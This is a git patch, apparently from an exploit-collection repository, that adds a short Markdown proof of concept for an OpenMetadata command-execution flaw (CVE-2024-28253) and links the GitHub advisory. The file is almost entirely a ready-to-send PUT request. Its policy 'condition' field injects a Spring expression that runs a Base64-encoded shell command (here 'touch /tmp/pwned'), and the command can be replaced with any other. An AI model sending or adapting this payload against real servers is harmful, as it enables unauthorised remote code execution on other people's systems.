From 47587deb7196a46b67b79706fd1a24b4425c0c75 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 2 May 2024 14:55:16 +0800
Subject: [PATCH] =?UTF-8?q?Create=20OpenMetadata=E5=91=BD=E4=BB=A4?= =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E(CVE-2024-28253).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 OpenMetadata命令执行漏洞(CVE-2024-28253).md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 OpenMetadata命令执行漏洞(CVE-2024-28253).md

diff --git a/OpenMetadata命令执行漏洞(CVE-2024-28253).md b/OpenMetadata命令执行漏洞(CVE-2024-28253).md
new file mode 100644
index 0000000..dfb238d
--- /dev/null
+++ b/OpenMetadata命令执行漏洞(CVE-2024-28253).md
@@ -0,0 +1,19 @@
+## OpenMetadata命令执行漏洞(CVE-2024-28253)
+
+
+## poc
+```
+PUT /api/v1/policies HTTP/1.1
+Host: localhost:8585
+sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
+Authorization: Bearer
+accept: application/json
+Connection: close
+Content-Type: application/json
+Content-Length: 367
+
+{"name":"TeamOnlyPolicy","rules":[{"name":"TeamOnlyPolicy-Rule","description":"Deny all the operations on all the resources for all outside the team hierarchy..","effect":"deny","operations":["All"],"resources":["All"],"condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]}
+```
+
+## 漏洞来源
+- https://github.com/advisories/GHSA-7vf4-x5m2-r6gr